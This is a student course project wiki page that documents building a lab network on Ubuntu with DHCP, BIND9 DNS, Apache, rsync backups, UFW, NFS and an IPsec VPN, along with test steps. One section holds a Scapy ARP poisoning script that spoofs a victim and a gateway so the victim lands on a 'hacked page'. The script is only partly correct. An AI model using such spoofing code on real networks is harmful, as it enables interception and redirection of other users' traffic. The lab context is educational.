Data Networking/Fall 2016/PAKP

Group Members
Ashwin Maniyankode Chandranathan Kailash Natarajan Pooja Deshpande Pranoy Thykkoottathil Jose

Objective
The main objective of this project is to build a secure and a dynamic network which has  Dynamic Host Configuration Protocol(DHCP),Domain Name Server(DNS), Webserver, Firewall and Backup system using the Linux-Ubuntu operating system.

Dynamic Host Configuration Protocol
Dynamic Host Configuration Protocol (DHCP) is a network protocol that enables a server to automatically assign an IP address to a computer from a defined range of IP addresses (i.e., a scope) configured for a given network.The DHCP server leases an address to any DHCP-enabled client when it starts up on the network. Since IP addresses are dynamic (leased) rather than static (permanently assigned), addresses which are no longer in use are automatically returned to the pool for reallocation. Both IPV4 and IPV6 addresses can be assigned using DHCP server.

DHCP supports three mechanisms for IP address allocation.

One or more of these mechanisms will get used depending on the policies of the network administrator.
 * 1) Automatic allocation: DHCP assigns IP address to a client when it gets the requests from them.
 * 2) Dynamic allocation: DHCP assigns IP addresses to clients for a specified period of time (or until the client explicitly relinquishes the address). When the lease expires, then the client will have to request for an extension on the lease or request another IP.
 * 3) Manual allocation: Using DHCP, we can assign the same IP to a particular device by using its MAC address as an identifier. For example, a server will always have the same IP, even though it is getting it via. the DHCP server.

Domain Name System
DNS is an application layer protocol with the ability to translate domain names to IP addresses and vice versa. The basic job of the DNS is to provide simplicity for the application user; i.e. it provides an easier way that will translate the user-friendly domain name to a machine understanding IP address which is then used to fetch and forward data. With the explosion in the use of internet and World Wide Web in commercial, security, social markets among many others, it is not possible for a user to remember the logical IP addresses of the sites. This is where DNS steps in and makes it possible such that the user just needs to remember the user-friendly domain name like www.google.com from which the DNS will translate it into an IP address as 8.8.8.8.

Jumping further into the behavior of the protocol, the DNS stores DNS records for a domain name with corresponding IP addresses and it will respond to queries from the user with answers from its database.

DNS Records are nothing but the database files from which the mappings are fetched. Some of the commonly used DNS records are A, CNAME, MX, PTR, NS.

Webserver & Firewall
A webserver should run on the Linux OS to host a website. Apache2 is the used webserver.A firewall is used to provide a layer of security to control the incoming and outgoing traffic in a network and to block and filter packets to go into the system. The firewall can for a system or even a specific server with bunches of databases or confidential data which is being shielded from unapproved clients in/outside the system.

Dynamic Host Configuration Protocol
1. When a Client, configured with the TCP/IP setting “Obtain an IP address automatically(DHCP)”, plugs into a network, it sends out a broadcast from UDP port 68 to UDP port 67 to “DISCOVER” a DHCP Server (or relay agent). 2.The DHCP Server then responds by sending out an “Offer” (through a relay agent if applicable). 3.Then the client sends out a “Request”, requesting an IP address. 4. This request is finally “Acknowledged” by the server so that the client starts using the IP address.

Domain Name Server
1.	The requesting host will generate a DNS query packet, which will be passed to the Local DNS Server that is connected to the host network. 2.	The Local DNS Server will receive this query and forward this to appropriate Root Name Server. The Root Name Server will check if it is a valid domain and if there are entries for that in its database and reply to the Local DNS. 3.	The Local DNS will then send a query to the TLD DNS Server which will send the details of the Authoritative Name Server which will have the details of the mapping address or name. 4.	The Local DNS Server will then send a query to the Authoritative Name server seeking the mapping for the domain name or the IP address which was initially sent by the requesting host.

Webserver
1.The client initiates a TCP connection with the web server IP provider. 2.The connection involves a 3 way handshake mechanism. 3.First, the clients sends a SYN message requesting TCP connection to the browser at port 80. 4.The server responds with a SYN-ACK message acknowledging the request and requests the client to open a port for the server to send information. 5.The client responds with the ACK message and also sends a request for the HTML page.

DHCP
Step 1: Install DHCP server package

sudo apt-get install isc-dhcp-server

Step 2: Edit the isc-dhcp-server file

sudo vim /etc/default/isc-dhcp-server

On line 11 change: INTERFACES=”ens33” Save and Exit

Step 3: Configure the DHCP server for ipv4 Editing file /etc/dhcp/dhcpd.conf

sudo vim /etc/dhcp/dhcpd.conf subnet 192.168.10.0 netmask 255.255.255.0 { range 192.168.10.30 192.168.10.99; option domain-name-servers 192.168.10.10; option subnet-mask 255.255.255.0; option routers 192.168.10.10; option broadcast-address 192.168.10.255; default-lease-time 600; max-lease-time 7200; }            iface eth0 inet6 static address 2001:0db8:edfa:1234::1 netmask 64 gateway 2001:0db8:edfa:1234::2

For the servers within the network to always have the same IP, we have matched their MAC addresses with a specific IP.

host dns-server { hardware ethernet 00:0c:29:8e:69:00; fixed-address 192.168.10.10; }            host web-server { hardware ethernet 00:0c:29:5c:7d:2e; fixed-address 192.168.10.20; }            host nfs-server { hardware ethernet 00:0c:29:8f:8b:d9; fixed-address 192.168.10.15; }

Step 4 : Set the static IP address of the DHCP server

sudo vim /etc/network/interfaces auto lo            iface lo inet loopback

auto ens33 iface ens33 inet static address 192.168.10.18 netmask 255.255.255.0 gateway 192.168.10.1 broadcast 192.168.10.255 dns-domain-nameserver 192.168.10.10 Step 5: Edit the resolv.conf file sudo vim /etc/resolv.conf nameserver 192.168.10.10

Step 6: Restart the DHCP server

sudo /etc/init.d/isc-dhcp-server restart

Step 7: Configuring the DHCPv6 server

Create a file named dhcpd6.conf

sudo vim /etc/dhcp/dhcpd6.conf

#/etc/dhcp/dhcpd6.conf default-lease-time 86400; preferred-lifetime 80000; allow leasequery; subnet6 2001:0db8:edfa:1234::/64 { # Range for clients range6 2001:0db8:edfa:1234:5678::aaaa 2001:0db8:edfa:1234:5678::ffff; }

DNS Server
In this project all the servers are in a private network and the servers receive its IP from the DHCP server. For configuring DNS, we have used Bind9 (Berkeley Internet Name Domain v9) on Ubuntu for resolving hostnames and IP addresses by the clients.

Prerequisite: To configure DNS server one must have root user permissions and install Bind9. To install Bind9, use the following command,

Command: sudo apt-get update sudo apt-get install bind9 bind9utils bind9-doc sudo systemctl daemon-reload sudo systemctl restart bind9

Step 1: Obtain static IP from DHCP server and assign that in the interface – “/etc/network/interfaces”

Command: cd /etc/network sudo nano interfaces auto eth0 iface eth0 inet static address 192.168.10.10 netmask 255.255.255.0 network 192.168.10.0 broadcast 192.168.10.255 gateway 192.168.10.1 Step 2: Now add the Name Server and Hostname details with respect to the webpage for which address resolving has to be done in the – “/etc/hosts” file.

Command: cd /etc sudo nano hosts 127.0.0.1	localhost 192.168.10.10 ubuntu.project.com Ubuntu

Step 3: Provide the hostname for the webpage to be resolved in the – “/etc/hostname” file.

Command: cd /etc sudo nano hostname ubuntu.project.com

Step 4: Provide the IP address for the Name Server and name of the webpage in the – “/etc/resolvconf/resolv.conf.d/head” file.

Command: cd /etc/resolvconf/resolv.conf.d              sudo nano head nameserver 192.168.10.10 search project.com

Step 5: For the DNS Server we have to specify the forward and the reverse zones that will provide with the forward and reverse DN resolving. This can be done from the – “/etc/bind/named.conf.local” file.

Command: #Forward Zone  zone "project.com" { type master;				#specifying if the DNS server is master or slave file "/etc/bind/db.project.com";		#zone file path allow-transfer { 192.168.10.11; };       # secondary DNS IP               also-notify { 192.168.10.11; }; };

#Reverse Zone  zone "10.168.192.in-addr.arpa" { type master;				#specifying if the DNS server is master or slave file "/etc/bind/db.192";			#zone file path allow-transfer { 192.168.10.11; };       # secondary DNS IP               also-notify { 192.168.10.11; }; };

Step 6: Now to add the forwarder IP for the DNS we can configure that in the – “/etc/bind/named.conf.options” file. There is also one more option where you can use Access Lists to only allow specified IP addresses to access the DNS server which can also be added here.

Command: options { forwarders { 192.168.10.1;			       #forwarder IP for DNS };

Step 7: Now we have to create the forward and reverse zone which will act as the database from which the DNS server will look-up to resolve for the Domain name or IP address. This database file can be created with reference to the already existing local database file at – “/etc/bind/db.local” file and making our own copy as the – “/etc/bind/db.project.com” file for the forward zone and “/etc/bind/db.192” file for the reverse zone.

Command: Forward Zone Database:  cd /etc/bind sudo cp db.local db.project.com sudo cp db.local db.192 sudo nano /etc/bind/db.project.com ;              ; BIND data file for local loopback interface ;              $TTL      604800 @             IN              SOA              ubuntu.project.com. root.project.com. (                                             9                      ; Serial                                              604800                 ; Refresh                                              86400                  ; Retry                                              2419200                ; Expire                                              604800 )               ; Negative Cache TTL ;              @              IN              NS              ubuntu.project.com. @             IN              A               192.168.10.30 ubuntu        IN              A               192.168.10.30 web           IN              A               192.168.10.20 www           IN              CNAME           web.project.com. @             IN              AAAA            2001:db8:edfa:1234::15 ubuntu        IN              AAAA            2001:db8:edfa:1234::15 ;

Note:  •      The serial number 9 represents the number of times this database file has been edited and make sure you increment it each time the file is edited. •      The @ symbol means that the record applies in all cases not otherwise specified. •      That is followed by IN the record type A or CNAME or AAAA or NS

Reverse Zone Database:  sudo nano /etc/bind/db.192 ;              ; BIND reverse data file for local loopback interface ;              $TTL       604800 @             IN              SOA              ubuntu.project.com. root.project.com. (                                             6                 ; Serial                                              604800            ; Refresh                                              86400             ; Retry                                              2419200           ; Expire                                              604800 )          ; Negative Cache TTL ;              @              IN              NS              ubuntu.project.com. 30            IN              PTR             ubuntu.project.com. 20            IN              PTR             web.project.com. 20            IN              PTR             www.web.project.com. 5.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.4.3.2.1.a.f.d.e.8.b.d.0.1.0.0.2.ip6.arpa. IN             PTR              ubuntu.project.com. ;

Note:  •      The serial number 6 represents the number of times this database file has been edited and make sure you increment it each time the file is edited. •      The @ symbol means that the record applies in all cases not otherwise specified. •      That is followed by IN the record type PTR or NS

Step 8: Now that we have defined the database and the name servers for the DNS server, we have to restart the server for the configurations to take effect.

Command: sudo bind9 restart sudo init 6

Configuring Secondary DNS The primary DNS will provide with the domain name resolving functionality for the clients. If there is a failure in the primary DNS, then the client will not be able to resolve for the domain name and will be cut off from using the web. In order to overcome this, it is advisable to have a secondary DNS server which will act as a backup in case the primary DSN fails. It is relatively easier to configure the secondary DNS once the primary DNS is configured.

Prerequisite:  To configure DNS server one must have root user permissions and install Bind9. To install Bind9, use the following command,

Command: sudo apt-get update sudo apt-get install bind9 bind9utils bind9-doc sudo systemctl daemon-reload sudo systemctl restart bind9

Step 1: Obtain static IP from DHCP server and assign that in the interface – “/etc/network/interfaces”

Command: cd /etc/network sudo nano interfaces auto eth0 iface eth0 inet static address 192.168.10.11 netmask 255.255.255.0 network 192.168.10.0 broadcast 192.168.10.255 gateway 192.168.10.1

Step 2: Now add the Name Server and Hostname details with respect to the webpage for which address resolving has to be done in the – “/etc/hosts” file.

Command: cd /etc sudo nano hosts 127.0.0.1	localhost 192.168.10.11 ubuntu.project.com ubuntu

Step 3: Provide the hostname for the webpage to be resolved in the – “/etc/hostname” file.

Command:  cd /etc sudo nano hostname ubuntu.project.com

Step 4: Provide the IP address for the Secondary Name Server and name of the webpage in the – “/etc/resolvconf/resolv.conf.d/head” file.

Command: cd /etc/resolvconf/resolv.conf.d            sudo nano head nameserver 192.168.10.11 search project.com

Step 5: For the Secondary DNS Server we have to specify the forward and the reverse zones that will provide with the forward and reverse DN resolving. This can be done from the – “/etc/bind/named.conf.local” file

Command: #Forward Zone  zone "project.com" { type slave;                                #specifying if the DNS server is master or slave file "/etc/bind/db.project.com";           #zone file path masters { 192.168.10.10; };                # primary DNS IP            }; #Reverse Zone  zone "10.168.192.in-addr.arpa" { type slave;                             #specifying if the DNS server is master or slave file "/etc/bind/db.192";                #zone file path masters { 192.168.10.10; };             # primary DNS IP           };

Step 6: Now to add the forwarder IP for the secondary DNS, we can configure that in the – “/etc/bind/named.conf.options” file. There is also one more option where you can use Access Lists to only allow specified IP addresses to access the secondary DNS server which can also be added here.

Command: options { forwarders { 192.168.10.1;                              #forwarder IP for DNS };

Step 7: Now that we have defined the database and the name servers for the secondary DNS server, we have to restart the server for the configurations to take effect.

Command: sudo bind9 restart sudo init 6

Webserver
Step 1: To Install Apache2 Webserver Command: sudo apt-get install apache2 Step 2: To Check whether the web server is able to listen on port 80 Command: netstat -a | more Step 3: To restart the web server Command: sudo /etc/init.d/apache2 restart Step 4: To develop a webpage for the server Command: cd /var/www/html sudo nano index.html

Webserver Backup
The protocols used for backup are rsync and ssh. Rsync is a protocol used to synchronize files in Ubuntu. It updates only that data that is not yet synchronized with the backup file. Ssh protocol provides a secure channel to send and receive files on Unix machines.It uses encryption and decryption at the end users. Crontab is used for scheduling backups. Step 1: Install rsync sudo apt-get install rsync Step 2: Install ssh sudo apt-get install openssh-server Step 3: Create a public and a private key for security ssh-keygen -t rsa Step 4: Append new public key cat .ssh/id_rsa.pub | ssh ashwinmc1@192.168.10.15 'cat >> .ssh/authorized_keys' Step 5: Edit crontab crontab –e Step 6: Scheduling and run the rsync command from the crontab to automate the backup of the webserver 25**** rsync -avzP --delete -e ssh /var/www/html ashwinmc1@192.168.10.15:/home/ashwinmc1/Backup

Firewall
Step 1: Install UFW package sudo apt-get install ufw Step 2: Check UFW status sudo ufw status Step 3: Set Up Default Policies sudo ufw default deny incoming sudo ufw default allow outgoing Step 4: Allow SSH,http,ftp,https Connections sudo ufw allow from 192.168.10.0/24 to any port 443 sudo ufw allow from 192.168.10.0/24 to any port 80 sudo ufw allow from 192.168.10.0/24 to any port 21 sudo ufw allow from 192.168.10.0/24 to any port 22 Step 5: Disabling ping sudo nano /etc/ufw/before.rules Comment out this line: -A ufw-before-input -p icmp --icmp-type echo-request -j ACCEPT Step 6: Enable UFW sudo ufw enable

Algorithm
1. A client tries to connect to the network. 2. Once the client gets connected, he'll try to obtain an IP via DHCP. So a broadcast message will be sent out requesting an IP. 3. The DHCP server will provide an IP address to the client if the request is successful. Otherwise, 'request fail' message will be obtained and we will need to contact the network administrator for help. 4. The client will now try to access the web server. If the domain name server details obtained via DHCP is correct, a request will be sent to DNS to resolve the IP address of the domain. DNS will then reply with IP address of the web page. else if DNS reply fails, an error message will be displayed saying, ‘server not found.’ else if URL entered is wrong, an error message will be displayed saying, ‘webpage unavailable.’ Retry 5. Client accessed the web server. Now he sends HTTP request to the server. if the request is successful, the Web page will be displayed else Error message like ‘no data received’ will be displayed. Retry

Flow Chart
Flow chart has been provided in the project report.

ARP Poisoning
ARP poisoning has been implemented using Scapy.

# Import scapy from scapy.all import *

# Setting variables attIP="192.168.10.39" attMAC="00:0c:29:7b:64:65" vicIP="192.168.10.40" vicMAC="00:0c:29:60:af:21" dgwIP="192.168.10.20" dgwMAC="00:0c:29:5c:7d:2e"

# Forge the ARP packet for the victim arpFakeVic = ARP arpFakeVic.op=2 arpFakeVic.psrc=dgwIP arpFakeVic.pdst=vicIP arpFakeVic.hwdst=vicMAC

# Forge the ARP packet for the default GW         arpFakeDGW = ARP arpFakeDGW.op=2 arpFakeDGW.psrc=vicIP arpFakeDGW.pdst=dgwIP arpFakeDGW.hwdst=dgwMAC

# While loop to send ARP # when the cache is not spoofed while True:

# Send the ARP replies send(arpFakeVic) send(arpFakeDGW) print "ARP sent"

# Wait for a ARP replies from the default GW         sniff(filter="arp and host 10.0.0.1 or host 10.0.0.209", count=1)

NFS
Step 1:Configuring the NFS-server Command: sudo apt-get install nfs-kernel-server sudo chmod 777 location Edit the file sudo nano /etc/exports On the last line append below /home/ashwinmc1/mnt 192.168.10.0/255.255.255.0(rw,sync,root_squash,subtree_check) Save and Exit Change the directory cd /home/ashwinmc1/mnt touch newfile sudo nano newfile Start the server sudo service nfs-kernel-server start Step 2:Configuring the NFS-client Command to Install NFS client: sudo apt-get install nfs-common Make directory in a location sudo mount server ip(192.168.10.15):serverpath(/home/ashwinmc1/mnt) client path(/home/mnt) sudo reboot sudo mount -a

IPSEC VPN
IPSEC VPN has been implemented using the 'strongswan' package. IPSEC VPN helps make the connection between two servers more secure and it also makes sure that sniffing cannot be done between them.

VPN First Server Configuration
Step 1:Installing the 'strongswan' package Command: apt-get install ipsec-tools strongswan-starter

Step 2:Making the cryto map entries Edit the /etc/ipsec.conf file Command: vim /etc/ipsec.conf

conn red-to-blue authby=secret auto=route keyexchange=ike left=192.168.10.100 right=192.168.10.200 type=tunnel esp=aes128gcm16!

Step 3:Make the PSK entries

We need to edit the /etc/ipsec.secrets file

Command: vim /etc/ipsec.secrets

192.168.10.100 192.168.10.200 : PSK "project"

Step 4:Restart the ipsec service Command: ipsec restart

VPN Second Server Configuration
Step 1:Installing the 'strongswan' package Command: apt-get install ipsec-tools strongswan-starter

Step 2:Making the cryto map entries Edit the /etc/ipsec.conf file Command: vim /etc/ipsec.conf

conn blue-to-red authby=secret auto=route keyexchange=ike left=192.168.10.200 right=192.168.10.100 type=tunnel esp=aes128gcm16!

Step 3:Make the PSK entries

We need to edit the /etc/ipsec.secrets file

Command: vim /etc/ipsec.secrets

192.168.10.100 192.168.10.200 : PSK "project"

Step 4:Restart the ipsec service Command: ipsec restart

DHCP Test
If the clients are able to get the IP addresses from the defined range of IP addresses defined in the server pool then the DHCP is working properly. For example, since the DHCPv4 address pool is assigned from 192.168.10.30 to 192.168.10.99 and the DHCPv6 pool is assigned from 2001:0db8:edfa:1234:5678::aaaa to 2001:0db8:edfa:1234:5678::ffff, if a client gets assigned an IP address of 192.168.10.36 & 2001:0db8:edfa:1234:5678::aaa1 through DHCP, then the DHCP server is assigning IP addresses correctly and is functioning properly.

We can also see the status of the DHCP servers by using the commands:

systemctl status isc-dhcp-server

systemctl status isc-dhcp-server6

DNS Test
For testing the functioning and effectiveness of DNS, the following commands will be useful: 1) Dig The Domain Information Groper is used to query DNS name servers. It performs DNS lookups and returns the response from the name servers. Eg., We can perform a DIG from the secondary DNS using the following command, Dig 192.168.10.10 project.com AXFR This will return with the records from the master server. 2) Ping Ping is used for checking the network layer status of the server. This can be performed on both the master and the slave DNS to check out if they are reachable from both. 3) Nslookup nslookup is a command used to query DNS servers. Interactive mode gives permission to the user to query the name servers for getting information about hosts and domains. Non-interactive mode gives permission to the user for printing just the name and the information that is requested for a particular host or domain. 4) Host Host is used for DNS lookups. It resolves hostnames to IP addresses and vice versa.

Webserver Test
Open the web browser and enter the host name or the local IP address. If it is working, then the web server is up and running.

Firewall Test
A client can try to ping the servers that are blocked. If the response is 'request timed-out' then, the firewall has blocked the client and it is working as per the firewall rules.

VPN Test
To test IPSEC VPN, run a continuous ping from one server to the other. Simultaneously, run the command:

watch ipsec statusall

or

tcpdump esp

if the number of packets increases in the first case, or if you see packets come in the second case, then the IPSEC tunnel is configured properly.

ARP Poisoning Test
When the client tries to access the webpage, if he/she is redirected to the hacked page, then APR poisoning has been properly implemented.

Future Scope
1. Implementing AAA servers for added security. 2. Additional Firewall rules for added security. 3. Adding Mail servers. 4. Expanding server capabilities. 5. Increase the number of DNS for load distribution and decentralization.